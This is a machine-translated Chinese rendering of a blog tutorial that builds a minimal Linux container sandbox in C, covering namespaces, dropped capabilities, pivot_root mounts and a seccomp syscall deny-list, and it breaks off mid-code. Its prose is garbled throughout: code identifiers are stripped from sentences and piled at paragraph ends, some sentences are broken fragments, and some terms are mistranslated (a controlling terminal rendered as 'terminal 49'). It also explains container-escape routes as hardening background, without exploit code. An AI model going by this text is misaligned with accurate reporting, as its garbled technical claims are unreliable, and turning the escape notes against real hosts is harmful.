500 行代码实现的 Linux 容器 sandbox

文章目录

多年来，我一直直接或间接地使用 Linux 容器，但我想对他们更加熟悉。所以我写了一些代码。这我发誓，曾经是 500 行代码，但从那以后我修改了一些出版;我最终又写了大约 70 行。

我特别想找到一组最小的限制来运行不受信任的代码。这不是您应该如何处理容器任何暴露的东西：你应该限制你的一切能。但我认为重要的是要知道哪些权限是绝对不安全！我试图支持我说的话链接到代码或我信任的人，但我很想知道我是否错过了什么。

这是一段 noweb 风格的文字代码。命名的引用将扩展为名为的代码块。您可以找到纠结的来源在这里。本文档是 orgmode 文档，您可以在这里找到它的来源。本文档和此代码在 GPLv3;你可以在这里找到它的来源。<<x>>``x

容器设置

有几种互补和重叠的机制使现代 Linux 容器。大约

namespaces用于将内核对象分组到不同的集合中可由特定进程树访问。例如，pid 命名空间将进程列表的视图限制为进程在命名空间中。有几种不同类型的命名空间。我稍后会详细介绍。
capabilities这里用来对什么 uid 0 设置一些粗略的限制可以做。
cgroups是一种限制内存等资源使用的机制，磁盘 IO 和 CPU 时间。
setrlimit是限制资源使用的另一种机制。它比 cgroups 更老，但可以做一些 cgroups 做不到的事情。

这些都是 Linux 内核机制。Seccomp、功能和全部通过系统调用完成。已访问通过文件系统。setrlimit``cgroups

这里有很多，每个机制的范围都相当大清楚。它们重叠很多，很难找到最好的方法限制事物。用户命名空间有点新，并承诺统一一个很多这种行为。但不幸的是，用用户编译内核启用命名空间会使事情复杂化。使用用户命名空间进行编译会更改系统范围的功能语义，这可能会导致更多问题或者至少是混淆1.有一个用户暴露的大量权限提升错误命名空间。“理解和强化 Linux 容器”解释

尽管用户命名空间在以下方面提供了很大的优势安全性，由于用户命名空间的敏感性，有些冲突的安全模型和大量新代码，已发现多个严重漏洞和新漏洞不幸的是，漏洞继续被发现。它们既涉及用户命名空间本身的实现，也涉及用户命名空间本身的实现。允许非法或意外使用用户命名空间执行权限提升。通常会出现这些问题它们本身在不使用容器的系统上，以及内核版本足够新，可以支持用户命名空间。

此时，它在 Linux 中默认处于关闭状态编写2，但许多发行版应用补丁以有限的方式打开它3.

但所有这些问题都适用于编译了用户命名空间的主机在;我们是否使用用户命名空间并不重要，特别是因为我将阻止嵌套的用户命名空间。所以我会仅当用户命名空间可用时才使用它们。

（此代码中的用户命名空间处理最初很漂亮破碎。Jann Horn 特别给出了很好的反馈。谢谢！

`contained.c`

这个程序可以像这样使用，以运行为：/misc/img/bin/sh``/misc/img``root

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m ~/misc/busybox-img/ -u 0 -c /bin/sh
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.oQ5jOY...done.
=> trying a user namespace...writing /proc/32627/uid_map...writing /proc/32627/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
/ # whoami
root
/ # hostname
05fe5c-three-of-pentacles
/ # exit
=> cleaning cgroups...done.

所以，它的骨架：

contained.c
/* -*- compile-command: "gcc -Wall -Werror -lcap -lseccomp contained.c -o contained" -*- */
/* This code is licensed under the GPLv3. You can find its text here:
   https://www.gnu.org/licenses/gpl-3.0.en.html */


#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <pwd.h>
#include <sched.h>
#include <seccomp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/capability.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <linux/capability.h>
#include <linux/limits.h>

struct child_config {
   
	int argc;
	uid_t uid;
	int fd;
	char *hostname;
	char **argv;
	char *mount_dir;
};

<<capabilities>>

<<mounts>>

<<syscalls>>

<<resources>>

<<child>>

<<choose-hostname>>

int main (int argc, char **argv)
{
   
	struct child_config config = {
   0};
	int err = 0;
	int option = 0;
	int sockets[2] = {
   0};
	pid_t child_pid = 0;
	int last_optind = 0;
	while ((option = getopt(argc, argv, "c:m:u:"))) {
   
		switch (option) {
   
		case 'c':
			config.argc = argc - last_optind - 1;
			config.argv = &argv[argc - config.argc];
			goto finish_options;
		case 'm':
			config.mount_dir = optarg;
			break;
		case 'u':
			if (sscanf(optarg, "%d", &config.uid) != 1) {
   
				fprintf(stderr, "badly-formatted uid: %s\n", optarg);
				goto usage;
			}
			break;
		default:
			goto usage;
		}
		last_optind = optind;
	}
finish_options:
	if (!config.argc) goto usage;
	if (!config.mount_dir) goto usage;

<<check-linux-version>>

	char hostname[256] = {
   0};
	if (choose_hostname(hostname, sizeof(hostname)))
		goto error;
	config.hostname = hostname;

<<namespaces>>

	goto cleanup;
usage:
	fprintf(stderr, "Usage: %s -u -1 -m . -c /bin/sh ~\n", argv[0]);
error:
	err = 1;
cleanup:
	if (sockets[0]) close(sockets[0]);
	if (sockets[1]) close(sockets[1]);
	return err;
}

由于我将系统调用和功能列入黑名单，因此它是确保没有任何新的很重要。

<<check-linux-version>> =

	fprintf(stderr, "=> validating Linux version...");
	struct utsname host = {0};
	if (uname(&host)) {
		fprintf(stderr, "failed: %m\n");
		goto cleanup;
	}
	int major = -1;
	int minor = -1;
	if (sscanf(host.release, "%u.%u.", &major, &minor) != 2) {
		fprintf(stderr, "weird release format: %s\n", host.release);
		goto cleanup;
	}
	if (major != 4 || (minor != 7 && minor != 8)) {
		fprintf(stderr, "expected 4.7.x or 4.8.x: %s\n", host.release);
		goto cleanup;
	}
	if (strcmp("x86_64", host.machine)) {
		fprintf(stderr, "expected x86_64: %s\n", host.machine);
		goto cleanup;
	}
	fprintf(stderr, "%s on %s.\n", host.release, host.machine);

（这有一个错误。Reddit上的CaptainJey让我知道。谢谢！)

而且我还没有达到 500 行代码，所以我认为我有一些空间来构建漂亮的主机名。

<<choose-hostname>> =

int choose_hostname(char *buff, size_t len)
{
   
	static const char *suits[] = {
    "swords", "wands", "pentacles", "cups" };
	static const char *minor[] = {
   
		"ace", "two", "three", "four", "five", "six", "seven", "eight",
		"nine", "ten", "page", "knight", "queen", "king"
	};
	static const char *major[] = {
   
		"fool", "magician", "high-priestess", "empress", "emperor",
		"hierophant", "lovers", "chariot", "strength", "hermit",
		"wheel", "justice", "hanged-man", "death", "temperance",
		"devil", "tower", "star", "moon", "sun", "judgment", "world"
	};
	struct timespec now = {
   0};
	clock_gettime(CLOCK_MONOTONIC, &now);
	size_t ix = now.tv_nsec % 78;
	if (ix < sizeof(major) / sizeof(*major)) {
   
		snprintf(buff, len, "%05lx-%s", now.tv_sec, major[ix]);
	} else {
   
		ix -= sizeof(major) / sizeof(*major);
		snprintf(buff, len,
			 "%05lxc-%s-of-%s",
			 now.tv_sec,
			 minor[ix % (sizeof(minor) / sizeof(*minor))],
			 suits[ix / (sizeof(minor) / sizeof(*minor))]);
	}
	return 0;
}

命名空间

clone`是 et al. 后面的系统调用。这也是 所有这一切。从概念上讲，我们希望创建一个具有不同 属性：它应该能够挂载不同的主机名，设置自己的主机名，并执行其他操作。我们将指定所有 这是通过将标志传递给 [4](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.4) 来实现的。`fork()``/``clone

孩子需要向家长发送一些消息，所以我们会初始化 SocketPair，然后确保子项仅接收访问一个。

<<namespaces>> +=

	if (socketpair(AF_LOCAL, SOCK_SEQPACKET, 0, sockets)) {
   
		fprintf(stderr, "socketpair failed: %m\n");
		goto error;
	}
	if (fcntl(sockets[0], F_SETFD, FD_CLOEXEC)) {
   
		fprintf(stderr, "fcntl failed: %m\n");
		goto error;
	}
	config.fd = sockets[1];

但首先我们需要为堆栈设置空间。我们稍后会，这实际上会再次设置堆栈，所以这只是临时。5execve

<<namespaces>> +=

	#define STACK_SIZE (1024 * 1024)

	char *stack = 0;
	if (!(stack = malloc(STACK_SIZE))) {
   
		fprintf(stderr, "=> malloc failed, out of memory?\n");
		goto error;
	}

我们还将为该进程树准备 cgroup。稍后会详细介绍。

<<namespaces>> +=

	if (resources(&config)) {
   
		err = 1;
		goto clear_resources;
	}

我们将对挂载、pids、IPC 数据结构、网络进行命名空间设备，以及主机名/域名。我将在功能、cgroups 和 syscalls 的代码。

<<namespaces>> +=

	int flags = CLONE_NEWNS
		| CLONE_NEWCGROUP
		| CLONE_NEWPID
		| CLONE_NEWIPC
		| CLONE_NEWNET
		| CLONE_NEWUTS;

x86 上的堆栈以及 Linux 上运行的几乎所有其他堆栈都在增长向下，因此我们将添加以获取正下方的指针结束。6 我们也用所以的旗帜我们可以在上面。STACK_SIZE``|``SIGCHLD``wait

<<namespaces>> +=

	if ((child_pid = clone(child, stack + STACK_SIZE, flags | SIGCHLD, &config)) == -1) {
		fprintf(stderr, "=> clone failed! %m\n");
		err = 1;
		goto clear_resources;
	}

关闭孩子的插座并将其归零，这样如果有什么东西坏了，那么我们不要留下开放的 FD，可能会导致孩子或父母挂。

<<namespaces>> +=

	close(sockets[1]);
	sockets[1] = 0;

父进程将配置子进程的用户命名空间，然后暂停，直到子进程树退出7。

<<child>> +=

#define USERNS_OFFSET 10000
#define USERNS_COUNT 2000

int handle_child_uid_map (pid_t child_pid, int fd)
{
   
	int uid_map = 0;
	int has_userns = -1;
	if (read(fd, &has_userns, sizeof(has_userns)) != sizeof(has_userns)) {
   
		fprintf(stderr, "couldn't read from child!\n");
		return -1;
	}
	if (has_userns) {
   
		char path[PATH_MAX] = {
   0};
		for (char **file = (char *[]) {
    "uid_map", "gid_map", 0 }; *file; file++) {
   
			if (snprintf(path, sizeof(path), "/proc/%d/%s", child_pid, *file)
			    > sizeof(path)) {
   
				fprintf(stderr, "snprintf too big? %m\n");
				return -1;
			}
			fprintf(stderr, "writing %s...", path);
			if ((uid_map = open(path, O_WRONLY)) == -1) {
   
				fprintf(stderr, "open failed: %m\n");
				return -1;
			}
			if (dprintf(uid_map, "0 %d %d\n", USERNS_OFFSET, USERNS_COUNT) == -1) {
   
				fprintf(stderr, "dprintf failed: %m\n");
				close(uid_map);
				return -1;
			}
			close(uid_map);
		}
	}
	if (write(fd, & (int) {
    0 }, sizeof(int)) != sizeof(int)) {
   
		fprintf(stderr, "couldn't write: %m\n");
		return -1;
	}
	return 0;
}

子进程将向父进程发送一条消息是否应该设置 UID 和 GID 映射。如果这可行，它将、和。两者在这里都是必需的，因为有两个单独的组 Linux9 上的机制。我也在这里假设每个 uid 都有一个对应的 gid，这是常见的，但不是必然是普遍的。setgroups``setresgid``setresuid``setgroups``setresgid

<<child>> +=

int userns(struct child_config *config)
{
   
	fprintf(stderr, "=> trying a user namespace...");
	int has_userns = !unshare(CLONE_NEWUSER);
	if (write(config->fd, &has_userns, sizeof(has_userns)) != sizeof(has_userns)) {
   
		fprintf(stderr, "couldn't write: %m\n");
		return -1;
	}
	int result = 0;
	if (read(config->fd, &result, sizeof(result)) != sizeof(result)) {
   
		fprintf(stderr, "couldn't read: %m\n");
		return -1;
	}
	if (result) return -1;
	if (has_userns) {
   
		fprintf(stderr, "done.\n");
	} else {
   
		fprintf(stderr, "unsupported? continuing.\n");
	}
	fprintf(stderr, "=> switching to uid %d / gid %d...", config->uid, config->uid);
	if (setgroups(1, & (gid_t) {
    config->uid }) ||
	    setresgid(config->uid, config->uid, config->uid) ||
	    setresuid(config->uid, config->uid, config->uid)) {
   
		fprintf(stderr, "%m\n");
		return -1;
	}
	fprintf(stderr, "done.\n");
	return 0;
}

这就是子进程的最终结果。我们将执行我们的所有设置，切换用户和组，然后加载可执行。顺序在这里很重要：我们不能更换坐骑如果没有某些能力，我们就不能限制系统调用等。clone``unshare

<<child>> +=

int child(void *arg)
{
   
	struct child_config *config = arg;
	if (sethostname(config->hostname, strlen(config->hostname))
	    || mounts(config)
	    || userns(config)
	    || capabilities()
	    || syscalls()) {
   
		close(config->fd);
		return -1;
	}
	if (close(config->fd)) {
   
		fprintf(stderr, "close failed: %m\n");
		return -1;
	}
	if (execve(config->argv[0], config->argv, NULL)) {
   
		fprintf(stderr, "execve failed! %m.\n");
		return -1;
	}
	return 0;
}

能力

capabilities`细分 Linux 上“成为 root”的属性。它 用于划分权限，以便例如进程 可以分配网络设备 （），但不能读取所有文件 ().我将在这里使用它们来删除我们没有的那些 要。`CAP_NET_ADMIN``CAP_DAC_OVERRIDE

但并不是所有的“成为root”都被细分为能力。为例如，即使在能力下降10.有很多像这样的事情：这是为什么需要其他限制的部分原因能力。

考虑我们如何放弃功能也很重要。为我们提供了一个算法：man 7 capabilities

	During  an   execve(2),  the   kernel  calculates   the  new
	capabilities of the process using the following algorithm:

	    P'(ambient) = (file is privileged) ? 0 : P(ambient)

	    P'(permitted) = (P(inheritable) & F(inheritable)) |
					(F(permitted) & cap_bset) | P'(ambient)

	    P'(effective) = F(effective) ? P'(permitted) : P'(ambient)

	    P'(inheritable) = P(inheritable)    [i.e., unchanged]

	where:

	    P         denotes the  value of a thread  capability set
			    before the execve(2)

	    P'        denotes the  value of a thread  capability set
			    after the execve(2)

	    F         denotes a file capability set

	    cap_bset  is the  value of  the capability  bounding set
			    (described below).

我们希望并且并且是空的，并且只包含功能以上。这可以通过执行以下操作来实现P'(ambient)``P(inheritable)``P'(permitted)``P(effective)

清除我们自己的可继承集合。这将清除环境设置; 说：“环境能力集服从不变性如果两者都不允许，则任何功能都不可能是环境的并且是可继承的。这也清除了子项的可继承集。man 7 capabilities
清除边界集。这限制了我们将要提供的文件功能当我们时获得收益，其余的则受到清除可继承集和环境集。execve

如果我们只放弃我们自己的有效、允许和可继承设置，我们将重新获得子文件功能中的权限。例如，这是如何调用。11bash``ping

删除的功能

<<capabilities>> +=

int capabilities()
{
	fprintf(stderr, "=> dropping capabilities...");
CAP_AUDIT_CONTROL`、 和 并允许访问审核 内核系统（即像 这样的函数，通常 与 一起使用。内核会阻止通常 require 在第一个 pid 命名空间之外，但它 允许需要 AND 来自任何命名空间的消息。[12](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.12) 所以 让我们把它们都放下。我们特别想放弃， 因为它没有命名空间[13](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.13) 并且可能包含重要的 信息，但也可能允许包含 伪造日志或DOS审计系统的过程。`_READ``_WRITE``audit_set_enabled``auditctl``CAP_AUDIT_CONTROL``CAP_AUDIT_READ``CAP_AUDIT_WRITE``CAP_AUDIT_READ``CAP_AUDIT_WRITE

<<capabilities>> +=

	int drop_caps[] = {
		CAP_AUDIT_CONTROL,
		CAP_AUDIT_READ,
		CAP_AUDIT_WRITE,
CAP_BLOCK_SUSPEND`让程序阻止系统挂起， 要么 和 或 /proc/sys/wake_lock。[14](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.14) Supend 没有命名空间，因此 我们想防止这种情况发生。`EPOLLWAKEUP

<<capabilities>> +=

		CAP_BLOCK_SUSPEND,
CAP_DAC_READ_SEARCH`允许程序使用 任意。 理论上是一个 不透明类型，但实际上它与 inode 编号相对应。所以它是 易于暴力破解它们，并读取任意文件。这是由 塞巴斯蒂安·克拉默（Sebastian Krahmer）编写程序来读取任意系统文件 从 2014 年的 Docker 中。[15](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.15)`open_by_handle_at``struct file_handle *``struct file_handle

<<capabilities>> +=

		CAP_DAC_READ_SEARCH,

CAP_FSETID，不带用户名间距，允许进程修改 setuid 可执行文件，而不删除 setuid 位。这很漂亮危险！这意味着如果我们在容器中包含一个 setuid 二进制文件，我们很容易不小心留下一个危险的 setuid 根二进制文件在我们的磁盘上，任何用户都可以使用它来升级特权。16

<<capabilities>> +=

		CAP_FSETID,

CAP_IPC_LOCK可用于锁定进程自身的内存比通常会被允许17 人，这可能是拒绝服务的一种方式。

<<capabilities>> +=

		CAP_IPC_LOCK,
CAP_MAC_ADMIN`并由强制请求使用 控制系统 Apparmor、SELinux 和 SMACK 限制对 他们的设置。它们没有命名空间，因此它们可以被 包含规避系统范围访问控制的程序。`CAP_MAC_OVERRIDE

<<capabilities>> +=

		CAP_MAC_ADMIN,
		CAP_MAC_OVERRIDE,

CAP_MKNOD，不带用户名间距，允许程序创建与实际设备相对应的设备文件。这包括为现有硬件创建新的设备文件。如果此功能未丢弃，则包含的进程可以重新创建硬盘设备，重新挂载它，然后读取或写入它。18

<<capabilities>> +=

		CAP_MKNOD,

我担心这可以用来添加功能一个可执行文件和它，但实际上不可能设置功能的过程它没有 19.但！以这种方式更改的可执行文件可以由任何未沙盒执行用户，所以我认为它破坏了系统。CAP_SETFCAP``execve

<<capabilities>> +=

		CAP_SETFCAP,

CAP_SYSLOG允许用户对系统日志。重要的是，它不会阻止包含的进程读取系统日志，这可能会有风险。它还暴露了内核 addresses，可用于规避内核地址布局随机化20.

<<capabilities>> +=

		CAP_SYSLOG,
CAP_SYS_ADMIN`允许许多行为！我们不想要其中的大多数 （、 等）。有些会很好（，用于绑定挂载...），但额外的复杂性似乎并不多 值得。`mount``vm86``sethostname``mount

<<capabilities>> +=

		CAP_SYS_ADMIN,
CAP_SYS_BOOT`允许程序重新启动系统（系统调用）并加载新内核（和系统调用）[21](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.21)。我们绝对不想要 这。 是用户命名空间的，并且函数仅起作用 在 root 用户命名空间中，但这些都对我们没有帮助。`reboot``kexec_load``kexec_file``reboot``kexec*

<<capabilities>> +=

		CAP_SYS_BOOT,
CAP_SYS_MODULE`由系统调用 、 [22](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.22) 使用，由 [23](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.23) 的代码使用 以及使用 ioctl[24](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.24) 加载设备模块的代码。`delete_module``init_module``finit_module``kmod

<<capabilities>> +=

		CAP_SYS_MODULE,

CAP_SYS_NICE允许进程在给定的 PID 上设置更高的优先级比默认的25 多。默认内核调度程序对 PID 命名空间一无所知，因此包含拒绝向系统其余部分提供服务的进程26.

<<capabilities>> +=

		CAP_SYS_NICE,
CAP_SYS_RAWIO`允许使用 、 和 [27](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.27) 完全访问主机系统内存，但 包含的进程需要在 命名空间。[28](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.28). 但它也允许像 和 这样的东西，它们允许对 IO 端口[29](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.29) 进行原始访问。`/proc/kcore``/dev/mem``/dev/kmem``mknod``iopl``ioperm

<<capabilities>> +=

		CAP_SYS_RAWIO,

CAP_SYS_RESOURCE具体允许规避内核范围限制，所以我们可能应该把它放到30 个。但是我不要认为这可以比 DOS 做得更多内核，一般31.

<<capabilities>> +=

		CAP_SYS_RESOURCE,

CAP_SYS_TIME：设置时间没有命名空间，因此我们应该防止包含的进程不会改变整个系统时间32.

<<capabilities>> +=

		CAP_SYS_TIME,
CAP_WAKE_ALARM`，like ，让包含的进程 干扰 Suspend[33](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.33)，我们希望防止这种情况发生。`CAP_BLOCK_SUSPEND

<<capabilities>> +=

		CAP_WAKE_ALARM
	};

<<capabilities>> +=

	size_t num_caps = sizeof(drop_caps) / sizeof(*drop_caps);
	fprintf(stderr, "bounding...");
	for (size_t i = 0; i < num_caps; i++) {
   
		if (prctl(PR_CAPBSET_DROP, drop_caps[i], 0, 0, 0)) {
   
			fprintf(stderr, "prctl failed: %m\n");
			return 1;
		}
	}
	fprintf(stderr, "inheritable...");
	cap_t caps = NULL;
	if (!(caps = cap_get_proc())
	    || cap_set_flag(caps, CAP_INHERITABLE, num_caps, drop_caps, CAP_CLEAR)
	    || cap_set_proc(caps)) {
   
		fprintf(stderr, "failed: %m\n");
		if (caps) cap_free(caps);
		return 1;
	}
	cap_free(caps);
	fprintf(stderr, "done.\n");
	return 0;
}

保留的能力

跟踪我没有放弃的功能很重要，太。

我听说过多个地方34 可能会公开与（即）相同的功能，但据我所知并非如此真。只有 35 个就无处可去，而且只有内核中的用法是在 Unix 权限检查中代码36.所以我的理解是，它本身不允许进程在外部读取其挂载命名空间（“DAC”或“Discretionary Access Control”）这里指的是普通的 UNIX 权限）。CAP_DAC_OVERRIDE``CAP_DAC_READ_SEARCH``open_by_handle_at``shocker.c``CAP_DAC_OVERRIDE``CAP_DAC_OVERRIDE

CAP_FOWNER`、 和 挂载命名空间中的文件。`CAP_LEASE``CAP_LINUX_IMMUTABLE

同样，允许进程打开记帐和为自己关闭。系统调用采用要记录到的路径（该路径必须在 mount 命名空间内），并且仅在调用时进行操作过程。我们在容器化中没有使用流程记帐，因此，关闭它也应该是无害的。37CAP_SYS_PACCT``acct

CAP_IPC_OWNER仅由遵循 IPC 的函数使用命名空间38;因为我们在一个单独的 IPC 命名空间中从主机，我们可以允许这样做。

CAP_NET_ADMIN`让进程创建网络设备; 让进程绑定到这些端口上的低端口 设备; 允许进程在这些上发送原始数据包 设备。由于我们要用虚拟隔离网络 bridge，并且包含的进程位于网络命名空间内， 这些不应该是问题[39](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.39).我想知道 我们是否可以像现在这样重新创建现有设备，但我 不要以为这是不可能的 [40](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.40).`CAP_NET_BIND_SERVICE``CAP_NET_RAW``mknod
CAP_SYS_PTRACE`不允许跨 PID 的 ptrace 命名空间[41](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.41). 不允许信号通过 PID 命名空间[42](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.42).`CAP_KILL
CAP_SETUID`并有类似的行为[43](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.43)：`CAPSETGID

Make arbitrary manipulations of process UIDS and GIDs and supplementary GID list，这仅适用于命名空间。
forge UID (GID) when passing socket credentials via UNIX domain socketsmount 命名空间应该阻止我们读取主机系统的 UNIX 域套接字。
write a user(group ID) mapping in a user namespace (see user_namespaces(7))：这是，这将是隐藏在容器内。/proc/self/uid_map

CAP_SETPCAP只允许进程添加或删除它们已经有效地拥有;man 7 capabilities说道

如果支持文件功能：添加任何功能从调用线程的边界集到其可继承集;从边界中删除功能 set （通过 prctl（2） PR_CAPBSET_DROP）;对 securebits 标志。

我们已经从边界集中删除了所有相关内容，并删除了其他功能应该是无害的。

CAP_SYS_CHROOT传统上通过将 root 更改为具有 setuid 根二进制文件和被篡改动态的目录图书馆44.此外，它还可以使用逃脱 chroot 的“监狱”45.这些都不是应该与我们的设置相关，因此这应该是无害的。

布拉德·斯宾格勒（Brad Spengler）在《虚假边界和任意代码执行》中说可以“临时更换键盘通过 KDSETKEYCODE ioctl 映射管理员的 tty 以导致要执行的命令与预期不同的命令“，但这又是针对应该无法访问的设备 mount 命名空间。CAP_SYS_TTYCONFIG``ioctl

坐骑

子进程位于自己的挂载命名空间中，因此我们可以卸载它特别不应该访问的东西。方法如下：

创建一个临时目录，并在其中创建一个。
将 user 参数的挂载绑定到临时目录
pivot_root，使绑定挂载为我们的根目录并挂载旧的 root 到内部临时目录。
umount旧的根目录，并删除内部临时目录。

但首先，我们将使用 .这主要是一个方便，使绑定挂载在我们的外部是看不见的命名空间。MS_PRIVATE

<<mounts>> =

<<pivot-root>>

int mounts(struct child_config *config)
{
   
	fprintf(stderr, "=> remounting everything with MS_PRIVATE...");
	if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL)) {
   
		fprintf(stderr, "failed! %m\n");
		return -1;
	}
	fprintf(stderr, "remounted.\n");

	fprintf(stderr, "=> making a temp directory and a bind mount there...");
	char mount_dir[] = "/tmp/tmp.XXXXXX";
	if (!mkdtemp(mount_dir)) {
   
		fprintf(stderr, "failed making a directory!\n");
		return -1;
	}

	if (mount(config->mount_dir, mount_dir, NULL, MS_BIND | MS_PRIVATE, NULL)) {
   
		fprintf(stderr, "bind mount failed!\n");
		return -1;
	}

	char inner_mount_dir[] = "/tmp/tmp.XXXXXX/oldroot.XXXXXX";
	memcpy(inner_mount_dir, mount_dir, sizeof(mount_dir) - 1);
	if (!mkdtemp(inner_mount_dir)) {
   
		fprintf(stderr, "failed making the inner directory!\n");
		return -1;
	}
	fprintf(stderr, "done.\n");

	fprintf(stderr, "=> pivoting root...");
	if (pivot_root(mount_dir, inner_mount_dir)) {
   
		fprintf(stderr, "failed!\n");
		return -1;
	}
	fprintf(stderr, "done.\n");

	char *old_root_dir = basename(inner_mount_dir);
	char old_root[sizeof(inner_mount_dir) + 1] = {
    "/" };
	strcpy(&old_root[1], old_root_dir);

	fprintf(stderr, "=> unmounting %s...", old_root);
	if (chdir("/")) {
   
		fprintf(stderr, "chdir failed! %m\n");
		return -1;
	}
	if (umount2(old_root, MNT_DETACH)) {
   
		fprintf(stderr, "umount failed! %m\n");
		return -1;
	}
	if (rmdir(old_root)) {
   
		fprintf(stderr, "rmdir failed! %m\n");
		return -1;
	}
	fprintf(stderr, "done.\n");
	return 0;
}
pivot_root`是一个系统调用，让我们将挂载与 另一个。Glibc 没有为它提供包装器，但包含一个 prototype。我真的不明白，但好吧，我们会的 包括我们自己的。`/

<<pivot-root>> =

int pivot_root(const char *new_root, const char *put_old)
{
	return syscall(SYS_pivot_root, new_root, put_old);
}

值得注意的是，我正在避免打包和解包器皿。这是肥沃的土壤漏洞46;我会指望用户确保装载的目录不包含受信任或敏感文件或硬链接。

系统调用

我会将我可以证明造成伤害的系统调用列入黑名单或沙盒逃生。同样，这不是最好的方法，但它似乎是最能说明问题的。

Docker 的文档和默认的 seccomp 配置文件是合理的危险系统调用的来源47.他们还包括过时的系统调用和与能力受限;我会忽略这些。

不允许的系统调用

<<syscalls>> +=

#define SCMP_FAIL SCMP_ACT_ERRNO(EPERM)

int syscalls()
{
	scmp_filter_ctx ctx = NULL;
	fprintf(stderr, "=> filtering syscalls...");
	if (!(ctx = seccomp_init(SCMP_ACT_ALLOW))

我们想阻止创建新的 setuid / setgid 可执行文件，因为在没有用户命名空间的情况下，包含的进程可以创建一个 setuid 二进制文件，任何用户都可以使用它来获取根。48

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))

允许包含的进程启动新的用户命名空间可以允许获得新的（尽管有限的）能力的过程，因此我们防止它。

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(unshare), 1,
				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(clone), 1,
				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))

TIOCSTI允许包含的进程写入控制 49号航站楼。

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ioctl), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, TIOCSTI, TIOCSTI))

内核密钥环系统未命名空间。50

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(keyctl), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(add_key), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(request_key), 0)

在 Linux 4.8 之前，完全破坏了 seccomp51。ptrace

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ptrace), 0)

这些系统调用允许进程分配 NUMA 节点。我没有任何具体的想法，但我可以看到这些被用来否认服务到主机上的其他一些 NUMA 感知应用程序。

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(mbind), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(migrate_pages), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(move_pages), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(set_mempolicy), 0)

userfaultd允许用户空间处理页面故障52.它不需要任何权限，因此在理论上，由非特权用户调用应该是安全的。但它可用于通过触发页面错误来暂停内核中的执行在系统调用中。这是某些内核中的重要部分漏洞利用53.它很少被合法使用，所以我会禁用它。

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(userfaultfd), 0)

我最初担心是因为 Docker 文档说它“可能会泄露主机上的大量信息”，但它不能在我们的系统中用于查看以下信息：命名空间外进程54.但是，如果小于 2，则可以使用以发现内核地址和可能未初始化的内存。2 是默认值 since 是自 4.6 以来的默认值，但可以更改，并且依靠它似乎是个坏主意55.perf_event_open``/proc/sys/kernel/perf_event_paranoid

<<syscalls>> +=

